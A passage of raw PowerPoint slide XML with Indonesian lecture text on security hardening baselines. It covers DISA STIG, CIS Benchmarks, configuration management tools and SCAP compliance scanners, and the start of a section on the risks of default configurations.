              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Teknis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (STIG) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Information Systems Agency (DISA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CIS Benchmark, STIG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI DoD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Puppet, Chef, Ansible, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoreksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Security Content Automation Protocol (SCAP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>OpenSCAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CIS-CAT Pro, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CIS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SCAP (SCC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh DISA yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> STIG.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengerasan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berusaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyeimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
